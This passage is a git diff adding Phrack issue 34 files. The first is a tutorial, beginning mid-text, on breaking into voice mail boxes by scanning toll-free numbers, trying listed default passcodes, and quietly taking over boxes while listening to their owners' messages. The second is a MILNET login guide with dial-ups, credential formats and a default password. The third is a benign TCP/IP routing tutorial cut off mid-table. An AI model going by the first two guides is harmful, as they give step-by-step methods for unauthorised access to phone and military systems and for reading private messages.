+subject, I couldn't refer them to read anything, and decided to write one
+myself.  To the best of my knowledge, this is the most complete text on
+hacking vmb systems.  If you have any comments or suggestions, please let me
+know.
+
+Voice Mail Boxes (vmbs) have become a very popular way for hackers to get in
+touch with each other and share information.  Probably the main reason for
+this is their simplicity and availability.  Anyone can call a vmb regardless
+of their location or computer type.  Vmbs are easily accessible because most
+are toll free numbers, unlike bulletin boards.  Along with their advantages,
+they do have their disadvantages.  Since they are easily accessible this
+means not only hackers and phreaks can get information from them, but feds
+and narcs as well.  Often they do not last longer than a week when taken
+improperly.  After reading this file and practicing the methods described,
+you should be able to hack voice mail systems with ease.  With these thoughts
+in mind, let's get started.
+
+
+FINDING A VMB SYSTEM
+
+The first thing you need to do is find a VIRGIN (unhacked) vmb system.  If
+you hack on a system that already has hackers on it, your chance of finding
+a box is considerably less and it increases the chance that the system
+administrator will find the hacked boxes.  To find a virgin system, you need
+to SCAN some 800 numbers until you find a vmb.  A good idea is to take the
+number of a voice mail system you know, and scan the same exchange but not
+close to the number you have.
+
+
+FINDING VALID BOXES ON THE SYSTEM
+
+If you get a high quality recording (not an answering machine) then it is
+probably a vmb system.  Try entering the number 100, the recording should
+stop.  If it does not, you may have to enter a special key (such as '*' '#'
+'8' or '9') to enter the voice mail system.  After entering 100 it should
+either connect you to something or do nothing.  If it does nothing, keep
+entering (0)'s until it does something.  Count the number of digits you
+entered and this will tell you how many digits the boxes on the system are.
+You should note that many systems can have more than one box length depending
+on the first number you enter, Eg. Boxes starting with a six can be five
+digits while boxes starting with a seven can only be four.  For this file we
+will assume you have found a four digit system, which is pretty common.  It
+should do one of the following things...
+
+1)  Give you an error message, Eg. 'Mailbox xxxx is invalid.'
+2)  Ring the extension and then one of the following..
+    1)  Someone or no one answers.
+    2)  Connects you to a box.
+3)  Connect you to mailbox xxxx.
+
+If you get #1 then try some more numbers.  If you get #2 or #3 then you have
+found a valid vmb (or extension in the case of 2-1).  Extensions usually have
+a vmb for when they are not at their extension.  If you get an extension,
+move on.  Where you find one box you will probably find more surrounding it.
+Sometimes a system will try to be sneaky and put one valid vmb per 10 numbers.
+Eg. Boxes would be at 105, 116, 121, ... with none in between.  Some systems
+start boxes at either 10 after a round number or 100 after, depending on
+whether it is a three or four box system.  For example, if you do not find
+any around 100, try 110 and if you do not find any around 1000 try 1100.  The
+only way to be sure is to try EVERY possible box number.  This takes time but
+can be worth it.
+
+Once you find a valid box (even if you do not know the passcode) there is a
+simple trick to use when scanning for boxes outside of a vmb so that it does
+not disconnect you after three invalid attempts.  What you do is try two box
+numbers and then the third time enter a box number you know is valid.  Then
+abort ( usually by pressing (*) or (#) ) and it will start over again.  From
+there you can keep repeating this until you find a box you can hack on.
+
+
+FINDING THE LOGIN SEQUENCE
+
+Different vmb systems have different login sequences (the way the vmb owner
+gets into his box).  The most common way is to hit the pound (#) key from the
+main menu.  This pound method works on most systems, including Aspens (more
+on specific systems later).  It should respond with something like 'Enter
+your mailbox.' and then 'Enter your passcode.'  Some systems have the
+asterisk (*) key perform this function.  Another login method is hitting a
+special key during the greeting (opening message) of the vmb.  On a Cindy or
+Q Voice Mail system you hit the zero (0) key during the greet and since
+you've already entered your mailbox number it will respond with 'Enter your
+passcode.'  If (0) doesn't do anything try (#) or (*).  These previous two
+methods of login are the most common, but it is possible some systems will
+not respond to these commands.  If this should happen, keep playing around
+with it and trying different keys.   If for some reason you cannot find the
+login sequence, then save this system for later and move on.
+
+
+GETTING IN
+
+This is where the basic hacking skills come to use.  When a system
+administrator creates a box for someone, they use what's called a default
+passcode.  This same code is used for all the new boxes on the system, and
+often on other systems too.  Once the legitimate owner logs into his new vmb,
+they are usually prompted to change the passcode, but not everyone realizes
+that someone will be trying to get into their mailbox and quite a few people
+leave their box with the default passcode or no passcode at all.  You should
+try ALL the defaults I have listed first.
+
+
+DEFAULTS           BOX NUMBER      TRY
+
+box number (bn)    3234            3234        Most Popular
+bn backwards       2351            1532        Popular
+bn+'0'             323             3230        Popular With Aspens
+
+Some additional defaults in order of most to least common are:
+
+4d        5d        6d
+0000      00000     000000    *MOST POPULAR*
+9999      99999     999999    *POPULAR*
+1111      11111     111111    *POPULAR*
+1234      12345     123456    *VERY POPULAR WITH OWNERS*
+4321      54321     654321
+6789      56789     456789
+9876      98765     987654
+2222      22222     222222
+3333      33333     333333
+4444      44444     444444
+5555      55555     555555
+6666      66666     666666
+7777      77777     777777
+8888      88888     888888
+1991
+
+
+It is important to try ALL of these before giving up on a system.  If none of
+these defaults work, try anything you think may be their passcode.  Also
+remember that just because the system can have a four digit passcode the vmb
+owner does not have to have use all four digits.  If you still cannot get
+into the box, either the box owner has a good passcode or the system uses a
+different default.  In either case, move on to another box.  If you seem to
+be having no luck, then come back to this system later.  There are so many
+vmb systems you should not spend too much time on one hard system.
+
+If there's one thing I hate, it's a text file that says 'Hack into the
+system.  Once you get in...' but unlike computer systems, vmb systems really
+are easy to get into.  If you didn't get in, don't give up!  Try another
+system and soon you will be in.  I would say that 90% of all voice mail
+systems have a default listed above.  All you have to do is find a box with
+one of the defaults.
+
+
+ONCE YOU'RE IN
+
+The first thing you should do is listen to the messages in the box, if there
+are any.  Take note of the dates the messages were left.  If they are more
+than four weeks old, then it is pretty safe to assume the owner is not using
+his box.  If there are any recent messages on it, you can assume he is
+currently using his box.  NEVER take a box in use.  It will be deleted soon,
+and will alert the system administrator that people are hacking the system.
+This is the main reason vmb systems either go down, or tighten security.  If
+you take a box that is not being used, it's probable no one will notice for
+quite a while.
+
+
+SCANNING BOXES FROM THE INSIDE
+
+>From the main menu, see if there is an option to either send a message to
+another user or check receipt of a message.  If there is you can search for
+VIRGIN (unused) boxes) without being disconnected like you would from
+outside of a box.  Virgin boxes have a 'generic' greeting and name.  Eg.
+'Mailbox xxx' or 'Please leave your message for mailbox xxx...'   Write down
+any boxes you find with a generic greeting or name, because they will
+probably have the default passcode.  Another sign of a virgin box is a name
+or greeting like 'This mailbox is for ...' or a women's voice saying a man's
+name and vice versa, which is the system administrator's voice.  If the box
+does not have this feature, simply use the previous method of scanning boxes
+from the outside.  For an example of interior scanning, when inside an Aspen
+box, chose (3) from the main menu to check for receipt.  It will respond with
+'Enter box number.'  It is a good idea to start at a location you know there
+are boxes present and scan consecutively, noting any boxes with a 'generic'
+greeting.  If you enter an invalid box it will alert you and allow you to
+enter another.  You can enter invalid box numbers forever, instead of the
+usual three incorrect attempts from outside a box.
+
+
+TAKING A BOX
+
+Now you need to find a box you can take over.  NEVER take a box in use; it
+simply won't last.  Deserted boxes (with messages from months ago) are the
+best and last the longest.  Take these first.  New boxes have a chance of
+lasting, but if the person for whom the box was created tries to login,
+you'll probably lose it.  If you find a box with the system administrator's
+voice saying either the greeting or name (quite common), keeping it that way
+will prolong the box life, especially the name.
+
+This is the most important step in taking over a box!  Once you pick a box take
+ over, watch it for at least three days BEFORE changing anything!  Once
+you think it's not in use, then change only the passcode, nothing else!
+Then login frequently for two to three days to monitor the box and make sure
+no one is leaving messages in it.  Once you are pretty sure it is deserted,
+change your greeting to something like 'Sorry I'm not in right now, please
+leave your name and number and I'll get back to you.'  DO NOT say 'This is
+Night Ranger dudes...' because if someone hears that it's good as gone.  Keep
+your generic greeting for one week.  After that week, if there are no
+messages from legitimate people, you can make your greeting say whatever you
+want.  The whole process of getting a good vmb (that will last) takes about
+7-10 days, the more time you take the better chance you have of keeping it
+for long time.  If you take it over as soon as you get in, it'll probably
+last you less than a week.  If you follow these instructions, chances are it
+will last for months.  When you take some boxes, do not take too many at one
+time.  You may need some to scan from later.  Plus listening to the messages
+of the legitimate users can supply you with needed information, such as the
+company's name, type of company, security measures, etc.
+
+
+SYSTEM IDENTIFICATION
+
+After you have become familiar with various systems, you will recognize them
+by their characteristic female (or male) voice and will know what defaults
+are most common and what tricks you can use.  The following is a few of a few
+popular vmb systems.
+
+ASPEN is one of the best vmb systems with the most features.  Many of them
+will allow you to have two greetings (a regular and an extended absence
+greeting), guest accounts, urgent or regular messages, and numerous other
+features.  Aspens are easy to recognize because the female voice is very
+annoying and often identifies herself as Aspen.  When you dial up an Aspen
+system, sometimes you have to enter an (*) to get into the vmb system.  Once
+you're in you hit (#) to login.  The system will respond with 'Mailbox number
+please?'  If you enter an invalid mailbox the first time it will say 'Mailbox
+xxx is invalid...' and the second time it will say 'You dialed xxx, there is
+no such number...'  and after a third incorrect entry it will hang up.  If
+you enter a valid box, it will say the box owner's name and 'Please enter
+your passcode.'  The most common default for Aspens is either box number or
+box number + (0).  You only get three attempts to enter a correct box number
+and then three attempts to enter a correct passcode until it will disconnect
+you.  From the main menu of an Aspen box you can enter (3) to scan for other
+boxes so you won't be hung up like you would from outside the box.
+
+CINDY is another popular system.  The system will start by saying 'Good
+Morning/Afternoon/Evening.  Please enter the mailbox number you wish...' and
+is easy to identify.  After three invalid box entries the system will say
+'Good Day/Evening!' and hang up.  To login, enter the box number and during
+the greet press (0) then your passcode.  The default for ALL Cindy systems is
+(0).  From the main menu you can enter (6) to scan for other boxes so you
+won't be hung up.  Cindy voice mail systems also have a guest feature, like
+Aspens.  You can make a guest account for someone, and give them
+password, and leave them messages.  To access their guest account, they just
+login as you would except they enter their guest passcode.  Cindy systems
+also have a feature where you can have it call a particular number and
+deliver a recorded message.  However, I have yet to get this feature to work
+on any Cindy boxes that I have.
+
+MESSAGE CENTER is also very popular, especially with direct dials.  To login
+on a Message Center, hit the (*) key during the greet and the system will
+respond with 'Hello <name>.  Please enter your passcode.'  These vmbs are
+very tricky with their passcode methods.  The first trick is when you enter
+an invalid passcode it will stop you one digit AFTER the maximum passcode
+length.  Eg. If you enter 1-2-3-4-5 and it gives you an error message you enter
+ the fifth digit, that means the system uses a four digit passcode,
+which is most common on Message Centers.  The second trick is that if you enter
+an invalid code the first time, no matter what you enter as the second passcode
+it will give you an error message and ask again.  Then if you entered the
+correct passcode the second and third time it will let you login.  Also, most
+Message Centers do not have a default, instead the new boxes are 'open' and
+when you hit (*) it will let you in.  After hitting (*) the first time to
+login a box you can hit (*) again and it will say 'Welcome to the Message
+Center.' and from there you can dial other extensions.  This last feature can
+be useful for scanning outside a box.  To find a new box, just keep entering
+box numbers and hitting (*) to login.  If it doesn't say something to the
+effect of welcome to your new mailbox then just hit (*) again and it will
+send you back to the main system so you can enter another box.  This way you
+will not be disconnected.  Once you find a box, you can enter (6) 'M'ake a
+message to scan for other boxes with generic names.  After hitting (6) it
+will ask for a mailbox number.  You can keep entering mailbox numbers until
+you find a generic one.  Then you can cancel your message and go hack it out.
+
+
+Q VOICE MAIL is a rather nice system but not as common.  It identifies itself
+'Welcome to Q Voice Mail Paging' so there is no question about what system it
+is.  The box numbers are usually five digits and to login you enter (0) like
+a Cindy system.  From the main menu you can enter (3) to scan other boxes.
+
+There are many more systems I recognize but do not know the name for them.
+You will become familiar with these systems too.
+
+
+CONCLUSION
+
+You can use someone else's vmb system to practice the methods outlined above,
+but if you want a box that will last you need to scan out a virgin system.
+If you did everything above and could not get a vmb, try again on another
+system.  If you follow everything correctly, I guarantee you will have more
+vmbs than you know what to do with.  When you start getting a lot of them, if
+you are having trouble, or just want to say hi be sure to drop me a line on
+either of my internet addresses, or leave me a voice mail message.
+
+NOTE:  Some information was purposely not included in this file to prevent
+abuse to various systems.
+
+
+                               Night Ranger
+                        gbatson@clutx.clarkson.edu
+
+                 1-800-666-2336  Box 602  (After Business Hours)
+                 1-800-435-2008  Box 896  (After Business Hours)
+_______________________________________________________________________________
diff --git a/phrack34/7.txt b/phrack34/7.txt
new file mode 100644
index 0000000..9281e3d
--- /dev/null
+++ b/phrack34/7.txt
@@ -0,0 +1,179 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-four, File #7 of 11
+                     _____________________________________
+                    |                                     |
+                    |  : : : : : : : : : : : : : : : : :  |
+                    |  :    Brigadier General Swipe    :  |
+                    |  : : : : : : : : : : : : : : : : :  |
+                    |                                     |
+                    |              presents:              |
+                     _____________________________________
+
+                    |                                     |
+                    |      An Introduction to MILNET      |
+                    |                                     |
+                    |_____________________________________|
+
+        : :Introduction: :
+
+     First of all MILNET is a system used by branches of the military for
+unclassified communications.  MILNET produces that infamous TAC login xxx.  TAC
+MILNET is run out of the University of Southern California.  USC is the ISI
+master dial up.  I would also like to point out that the Department of Defense
+tends to frown on people browsing through there system.  With that in mind,
+here is a basic overview of MILNET operations.
+
+        : :Logging On: :
+
+    MILNET can be reached over through the "nets" or can be directly connected
+to by dialing 1-800-368-2217 or 213-306-1366.  The later is the ISI master dial
+up.  Most military bases connect through the 800 dial up owned by AT&T.
+
+ISIE MASTER LOGON PROCEDURE
+----------------------------
+1> call 213-306-1366
+2> when the phone stops ringing you are connected
+3> enter location number (9 digits) + 1 or 0
+4> hang up and it will call you
+5> pick up the phone and hit the '*' on your phone
+6> hit a carriage return on the computer
+7> at the 'what class?' prompt hit RETURN
+8> then a 'go' prompt will appear and log on as you would the 800 number.
+
+MILNET LOGIN PROCEDURE
+-----------------------
+> When you first connect you will see:
+
+'WELCOME TO DDN. FOR OFFICIAL USE ONLY.TAC LOGIN
+CALL NIC 1-800-235-3155 FOR HELP
+WRPAT TAC 113 #:36
+
+> the person logging on types:
+
+@o 1/103
+
+ YOU ALWAYS TYPE @o then other connections are:
+                          ISIA             3/103
+                          ISIB          10:3/52
+                          ISID          10:0/27
+                          ISIE             1/103    (THE EXAMPLE)
+                          ISIF             2/103
+                          VAX A         10:2/27
+
+> Next you will see a 'USER-ID' prompt. The first 4 characters vary but it is
+is always followed by a '-' and what ever connection you choose.
+
+User-Id:   (example)  CER5-ISIE or MRW1-ISIE
+
+> The first three letters are the initials of the user followed by a random
+number (1-9).
+
+Access Code: (example) 2285UNG6A or 22L8KK5CH
+
+> An access code will never contain a ( 1, 0, G, Z).
+
+@ USERNAME + PASSWORD        IE USERNAME SAC.512AREFW-LGTO
+
+THE USERNAME EXPLANATION:
+-------------------------
+     The first 3 letters in the example given above are SAC. This stands for
+Strategic Air Command, a branch of the Air Force.  Following that is a "."
+Then the unit number and the prime mission.  In this case 512AREFW", (512th
+AIR REFUELING WING).  Then a '-' and the Individual Squadron name 'LGTO'
+(LOGISTICS GROUND TRANSPORTATION OPERATIONS), a fancy name for the motor pool.
+     The password will not be echoed back and should be entered after the
+username.  The new user password as a default is: NEW-UZER-ACNT.
+
+        : :Options: :
+
+PROGRAMS AVAILABLE TO SAC USERS:
+-------------------------------
+
+ADUTY   aids in management of additional duty assignments.
+        (International help - use the ? and <ESC> keys, HELP.)
+
+ARCHIVE requests files to be stored on tape for later retrieval.
+        (Type HELP ARCHIVE <RET> at TOPS-20.)
+
+CHAT    Provides near real time communication between terminal users on the
+          same host computer.
+        (Use ? with CHAT.)
+
+DAILY   Executive appointment scheduling program
+
+DCOPY   Handles output on DIABLO and XEROX printers
+
+EMACS   Powerful full-screen text editor
+FOLLOW  Suspense follow up program
+
+FTP     provides file transfer capabilities between host computers
+
+FKEYS   allows user to define function key (real spiffaruni)
+
+HELP    the command used by stupid generals or hackers that have never used
+        milnet before
+
+HERMES  E-Mail
+
+NCPCALC spreadsheet program
+
+PHOTO   saves transcripts of sessions
+
+REMIND  sends user-created reminders
+
+RIPSORT a sophisticated data sorting program
+        (Described in SAC's User manual (sorry))
+
+SCRIBE  a powerful text formatter for preparing documents.
+        (ISI's manual, SCRIBE manual - soon on MILNET V.2)
+
+SPELL   text file spelling checker.
+        (HELP at TOPS-20 and <DOCUMENTATION> directory international help -?)
+
+SUSCON  allows the creating, sending, and clearing of suspenses.
+        (international help - ? and <ESC>, HELP command)
+
+TACOPY  used for printing hard copies of files
+        (international help - ?)
+
+TALK    pretty much the same as chat.
+
+TIPCOPY predecessor of TACOPY
+
+TEACH-EMACS     (SELF EXPLANATORY: GIVES LIST OF COMMANDS)
+
+TN      Tel-Net provides multi-host access on MILNET.
+        (HELP at TOPS-20 and <DOCUMENTATION> directory,
+         international help - use ? and <ESC>)
+
+XED     line oriented text editor.
+        (HELP at TOPS-20 and <DOCUMENTATION> directory)
+
+        : :Logging Out: :
+
+TYPE:  @L
+
+        : :ID Card: :
+
+     When a user gets a MILNET account he/she receives a card in the mail that
+looks similar to the diagram below.  It is credit card sized and will be blue &
+white.
+ _______________________________________
+/                                       \
+| HOST USC-ISIE 26.1.0.103              |
+| HOST ADMINISTRATOR GORDON,VICKI L.    |
+|---------------------------------------|
+| DDN CARD HOLDER:                      |
+| SMITH, BILL A, 1st LT.                |
+| CARD 418475                           |
+|---------------------------------------|
+| USER ID:CER5-ISIE                     |
+| ACCESS CODE:2285ANI6A                 |
+| USERNAME: SAC.512AREFW-LGTO           |
+| PASSWORD: NEW-UZER-ACNT               |
+\_______________________________________/
+_______________________________________________________________________________
+
+: : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : :
+_______________________________________________________________________________
diff --git a/phrack34/8.txt b/phrack34/8.txt
new file mode 100644
index 0000000..360f349
--- /dev/null
+++ b/phrack34/8.txt
@@ -0,0 +1,725 @@
+                            ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-Four, File #8 of 11
+
+                A TCP/IP Tutorial : Behind The Internet
+                            Part Two of Two
+
+                           October 4th, 1991
+
+                         Presented by  The Not
+
+5.  Internet Protocol
+
+   The IP module is central to internet technology and the essence of IP
+   is its route table.  IP uses this in-memory table to make all
+   decisions about routing an IP packet.  The content of the route table
+   is defined by the network administrator.  Mistakes block
+   communication.
+
+   To understand how a route table is used is to understand
+   internetworking.  This understanding is necessary for the successful
+   administration and maintenance of an IP network.
+
+   The route table is best understood by first having an overview of
+   routing, then learing about IP network addresses, and then looking
+   at the details.
+
+5.1  Direct Routing
+
+   The figure below is of a tiny internet with 3 computers: A, B, and C.
+   Each computer has the same TCP/IP protocol stack as in Figure 1.
+   Each computer's Ethernet interface has its own Ethernet address.
+   Each computer has an IP address assigned to the IP interface by the
+   network manager, who also has assigned an IP network number to the
+   Ethernet.
+
+                          A      B      C
+                          |      |      |
+                        --o------o------o--
+                        Ethernet 1
+                        IP network "development"
+
+                       Figure 6.  One IP Network
+
+   When A sends an IP packet to B, the IP header contains A's IP address
+   as the source IP address, and the Ethernet header contains A's
+   Ethernet address as the source Ethernet address.  Also, the IP header
+   contains B's IP address as the destination IP address and the
+   Ethernet header contains B's Ethernet address as the des
+                ----------------------------------------
+                |address            source  destination|
+                ----------------------------------------
+                |IP header          A       B          |
+                |Ethernet header    A       B          |
+                ----------------------------------------
+       TABLE 5.  Addresses in an Ethernet frame for an IP packet
+                              from A to B
+
+   For this simple case, IP is overhead because the IP adds little to
+   the service offered by Ethernet.  However, IP does add cost: the
+   extra CPU processing and network bandwidth to generate, transmit, and
+   parse the IP header.
+
+   When B's IP module receives the IP packet from A, it checks the
+   destination IP address against its own, looking for a match, then it
+   passes the datagram to the upper-level protocol.
+
+   This communication between A and B uses direct routing.
+
+5.2  Indirect Routing
+
+   The figure below is a more realistic view of an internet.  It is
+   composed of 3 Ethernets and 3 IP networks connected by an IP-router
+   called computer D.  Each IP network has 4 computers; each computer
+   has its own IP address and Ethernet address.
+
+          A      B      C      ----D----      E      F      G
+          |      |      |      |   |   |      |      |      |
+        --o------o------o------o-  |  -o------o------o------o--
+        Ethernet 1                 |  Ethernet 2
+        IP network "development"   |  IP network "accounting"
+                                   |
+                                   |
+                                   |     H      I      J
+                                   |     |      |      |
+                                 --o-----o------o------o--
+                                  Ethernet 3
+                                  IP network "factory"
+
+               Figure 7.  Three IP Networks; One internet
+
+   Except for computer D, each computer has a TCP/IP protocol stack like
+   that in Figure 1.  Computer D is the IP-router; it is connected to
+   all 3 networks and therefore has 3 IP addresses and 3 Ethernet
+   addresses.  Computer D has a TCP/IP protocol stack similar to that in
+   Figure 3, except that it has 3 ARP modules and 3 Ethernet drivers
+   instead of 2.  Please note that computer D has only one IP module.
+
+   The network manager has assigned a unique number, called an IP
+   network number, to each of the Ethernets.  The IP network numbers are
+   not shown in this diagram, just the network names.
+
+   When computer A sends an IP packet to computer B, the process is
+   identical to the single network example above.  Any communication
+   between computers located on a single IP network matches the direct
+   routing example discussed previously.
+
+   When computer D and A communicate, it is direct communication.  When
+   computer D and E communicate, it is direct communication.  When
+   computer D and H communicate, it is direct communication.  This is
+   because each of these pairs of computers is on the same IP network.
+
+   However, when computer A communicates with a computer on the far side
+   of the IP-router, communication is no longer direct.  A must use D to
+   forward the IP packet to the next IP network.  This communication is
+   called "indirect".
+
+   This routing of IP packets is done by IP modules and happens
+   transparently to TCP, UDP, and the network applications.
+
+   If A sends an IP packet to E, the source IP address and the source
+   Ethernet address are A's.  The destination IP address is E's, but
+   because A's IP module sends the IP packet to D for forwarding, the
+   destination Ethernet address is D's.
+
+                ----------------------------------------
+                |address            source  destination|
+                ----------------------------------------
+                |IP header          A       E          |
+                |Ethernet header    A       D          |
+                ----------------------------------------
+       TABLE 6.  Addresses in an Ethernet frame for an IP packet
+                         from A to E (before D)
+
+   D's IP module receives the IP packet and upon examining the
+   destination IP address, says "This is not my IP address," and sends
+   the IP packet directly to E.
+
+                ----------------------------------------
+                |address            source  destination|
+                ----------------------------------------
+                |IP header          A       E          |
+                |Ethernet header    D       E          |
+                ----------------------------------------
+       TABLE 7.  Addresses in an Ethernet frame for an IP packet
+                         from A to E (after D)
+
+   In summary, for direct communication, both the source IP address and
+   the source Ethernet address is the sender's, and the destination IP
+   address and the destination Ethernet addrss is the recipient's.  For
+   indirect communication, the IP address and Ethernet addresses do not
+   pair up in this way.
+
+   This example internet is a very simple one.  Real networks are often
+   complicated by many factors, resulting in multiple IP-routers and
+   several types of physical networks.  This example internet might have
+   come about because the network manager wanted to split a large
+   Ethernet in order to localize Ethernet broadcast traffic.
+
+5.3  IP Module Routing Rules
+
+   This overview of routing has shown what happens, but not how it
+   happens.  Now let's examine the rules, or algorithm, used by the IP
+   module.
+
+     For an outgoing IP packet, entering IP from an upper layer, IP must
+     decide whether to send the IP packet directly or indirectly, and IP
+     must choose a lower network interface.  These choices are made by
+     consulting the route table.
+
+     For an incoming IP packet, entering IP from a lower interface, IP
+     must decide whether to forward the IP packet or pass it to an upper
+     layer.  If the IP packet is being forwarded, it is treated as an
+     outgoing IP packet.
+
+     When an incoming IP packet arrives it is never forwarded back out
+     through the same network interface.
+
+   These decisions are made before the IP packet is handed to the lower
+   interface and before the ARP table is consulted.
+
+5.4  IP Address
+
+   The network manager assigns IP addresses to computers according to
+   the IP network to which the computer is attached.  One part of a 4-
+   byte IP address is the IP network number, the other part is the IP
+   computer number (or host number).  For the computer in table 1, with
+   an IP address of 223.1.2.1, the network number is 223.1.2 and the
+   host number is number 1.
+
+   The portion of the address that is used for network number and for
+   host number is defined by the upper bits in the 4-byte address.  All
+   example IP addresses in this tutorial are of type class C, meaning
+   that the upper 3 bits indicate that 21 bits are the network number
+   and 8 bits are the host number.  This allows 2,097,152 class C
+   networks up to 254 hosts on each network.
+
+   The IP address space is administered by the NIC (Network Information
+   Center).  All internets that are connected to the single world-wide
+   Internet must use network numbers assigned by the NIC.  If you are
+   setting up your own internet and you are not intending to connect it
+   to the Internet, you should still obtain your network numbers from
+   the NIC.  If you pick your own number, you run the risk of confusion
+   and chaos in the eventuality that your internet is connected to
+   another internet.
+
+5.5  Names
+
+   People refer to computers by names, not numbers.  A computer called
+   alpha might have the IP address of 223.1.2.1.  For small networks,
+   this name-to-address translation data is often kept on each computer
+   in the "hosts" file.  For larger networks, this translation data file
+   is stored on a server and accessed across the network when needed.  A
+   few lines from that file might look like this:
+
+   223.1.2.1     alpha
+   223.1.2.2     beta
+   223.1.2.3     gamma
+   223.1.2.4     delta
+   223.1.3.2     epsilon
+   223.1.4.2     iota
+
+   The IP address is the first column and the computer name is the
+   second column.
+
+   In most cases, you can install identical "hosts" files on all
+   computers.  You may notice that "delta" has only one entry in this
+   file even though it has 3 IP addresses.  Delta can be reached with
+   any of its IP addresses; it does not matter which one is used.  When
+   delta receives an IP packet and looks at the destination address, it
+   will recognize any of its own IP addresses.
+
+   IP networks are also given names.  If you have 3 IP networks, your
+   "networks" file for documenting these names might look something like
+   this:
+
+   223.1.2     development
+   223.1.3     accounting
+   223.1.4     factory
+
+   The IP network number is in the first column and its name is in the
+   second column.
+
+   From this example you can see that alpha is computer number 1 on the
+   development network, beta is computer number 2 on the development
+   network and so on.  You might also say that alpha is development.1,
+   Beta is development.2, and so on.
+
+   The above hosts file is adequate for the users, but the network
+   manager will probably replace the line for delta with:
+
+   223.1.2.4     devnetrouter    delta
+   223.1.3.1     facnetrouter
+   223.1.4.1     accnetrouter
+
+   These three new lines for the hosts file give each of delta's IP
+   addresses a meaningful name.  In fact, the first IP address listed
+   has 2 names; "delta" and "devnetrouter" are synonyms.  In practice
+   "delta" is the general-purpose name of the computer and the other 3
+   names are only used when administering the IP route table.
+
+   These files are used by network administration commands and network
+   applications to provide meaningful names.  They are not required for
+   operation of an internet, but they do make it easier for us.
+
+5.6  IP Route Table
+
+   How does IP know which lower network interface to use when sending
+   out a IP packet?  IP looks it up in the route table using a search
+   key of the IP network number extracted from the IP destination
+   address.
+
+   The route table contains one row for each route.  The primary columns
+   in the route table are:  IP network number, direct/indirect flag,
+   router IP address, and interface number.  This table is referred to
+   by IP for each outgoing IP packet.
+
+   On most computers the route table can be modified with the "route"
+   command.  The content of the route table is defined by the network
+   manager, because the network manager assigns the IP addresses to the
+   computers.
+
+5.7  Direct Routing Details
+
+   To explain how it is used, let us visit in detail the routing
+   situations we have reviewed previously.
+
+                        ---------        ---------
+                        | alpha |         | beta  |
+                        |    1  |         |  1    |
+                        ---------         ---------
+                             |               |
+                     --------o---------------o-
+                      Ethernet 1
+                      IP network "development"
+
+               Figure 8.  Close-up View of One IP Network
+
+   The route table inside alpha looks like this:
+
+     --------------------------------------------------------------
+     |network      direct/indirect flag  router   interface number|
+     --------------------------------------------------------------
+     |development  direct                <blank>  1               |
+     --------------------------------------------------------------
+                  TABLE 8.  Example Simple Route Table
+
+   This view can be seen on some UNIX systems with the "netstat -r"
+   command.  With this simple network, all computers have identical
+   routing tables.
+
+   For discussion, the table is printed again without the network number
+   translated to its network name.
+
+     --------------------------------------------------------------
+     |network      direct/indirect flag  router   interface number|
+     --------------------------------------------------------------
+     |223.1.2      direct                <blank>  1               |
+     --------------------------------------------------------------
+           TABLE 9.  Example Simple Route Table with Numbers
+
+5.8  Direct Scenario
+
+   Alpha is sending an IP packet to beta.  The IP packet is in alpha's
+   IP module and the destination IP address is beta or 223.1.2.2.  IP
+   extracts the network portion of this IP address and scans the first
+   column of the table looking for a match.  With this network a match
+   is found on the first entry.
+
+   The other information in this entry indicates that computers on this
+   network can be reached directly through interface number 1.  An ARP
+   table translation is done on beta's IP address then the Ethernet
+   frame is sent directly to beta via interface number 1.
+
+   If an application tries to send data to an IP address that is not on
+   the development network, IP will be unable to find a match in the
+   route table.  IP then discards the IP packet.  Some computers provide
+   a "Network not reachable" error message.
+
+5.9  Indirect Routing Details
+
+   Now, let's take a closer look at the more complicated routing
+   scenario that we examined previously.
+
+          ---------           ---------           ---------
+          | alpha |           | delta |           |epsilon|
+          |    1  |           |1  2  3|           |   1   |
+          ---------           ---------           ---------
+               |               |  |  |                |
+       --------o---------------o- | -o----------------o--------
+        Ethernet 1                |     Ethernet 2
+        IP network "Development"  |     IP network "accounting"
+                                  |
+                                  |     --------
+                                  |     | iota |
+                                  |     |  1   |
+                                  |     --------
+                                  |        |
+                                --o--------o--------
+                                    Ethernet 3
+                                    IP network "factory"
+
+             Figure 9.  Close-up View of Three IP Networks
+
+   The route table inside alpha looks like this:
+
+ ---------------------------------------------------------------------
+ |network      direct/indirect flag  router          interface number|
+ ---------------------------------------------------------------------
+ |development  direct                <blank>         1               |
+ |accounting   indirect              devnetrouter    1               |
+ |factory      indirect              devnetrouter    1               |
+ --------------------------------------------------------------------
+                      TABLE 10.  Alpha Route Table
+
+   For discussion the table is printed again using numbers instead of
+   names.
+
+  --------------------------------------------------------------------
+  |network      direct/indirect flag  router         interface number|
+  --------------------------------------------------------------------
+  |223.1.2      direct                <blank>        1               |
+  |223.1.3      indirect              223.1.2.4      1               |
+  |223.1.4      indirect              223.1.2.4      1               |
+  --------------------------------------------------------------------
+               TABLE 11.  Alpha Route Table with Numbers
+
+   The router in Alpha's route table is the IP address of delta's
+   connection to the development network.
+
+5.10  Indirect Scenario
+
+   Alpha is sending an IP packet to epsilon.  The IP packet is in
+   alpha's IP module and the destination IP address is epsilon
+   (223.1.3.2).  IP extracts th network portion of this IP address
+   (223.1.3) and scans the first column of the table looking for a
+   match.  A match is found on the second entry.
+
+   This entry indicates that computers on the 223.1.3 network can be
+   reached through the IP-router devnetrouter.  Alpha's IP module then
+   does an ARP table translation for devnetrouter's IP address and sends
+   the IP packet directly to devnetrouter through Alpha's interface
+   number 1.  The IP packet still contains the destination address of
+   epsilon.
+
+   The IP packet arrives at delta's development network interface and is
+   passed up to delta's IP module.  The destination IP address is
+   examined and because it does not match any of delta's own IP
+   addresses, delta decides to forward the IP packet.
+
+   Delta's IP module extracts the network portion of the destination IP
+   address (223.1.3) and scans its route table for a matching network
+   field.  Delta's route table looks like this:
+
+ ----------------------------------------------------------------------
+ |network      direct/indirect flag  router           interface number|
+ ----------------------------------------------------------------------
+ |development  direct                <blank>          1               |
+ |factory      direct                <blank>          3               |
+ |accounting   direct                <blank>          2               |
+ ----------------------------------------------------------------------
+                     TABLE 12.  Delta's Route Table
+
+   Below is delta's table printed again, without the translation to
+   names.
+
+ ----------------------------------------------------------------------
+ |network      direct/indirect flag  router           interface number|
+ ----------------------------------------------------------------------
+ |223.1.2      direct                <blank>          1               |
+ |223.1.3      direct                <blank>          3               |
+ |223.1.4      direct                <blank>          2               |
+ ----------------------------------------------------------------------
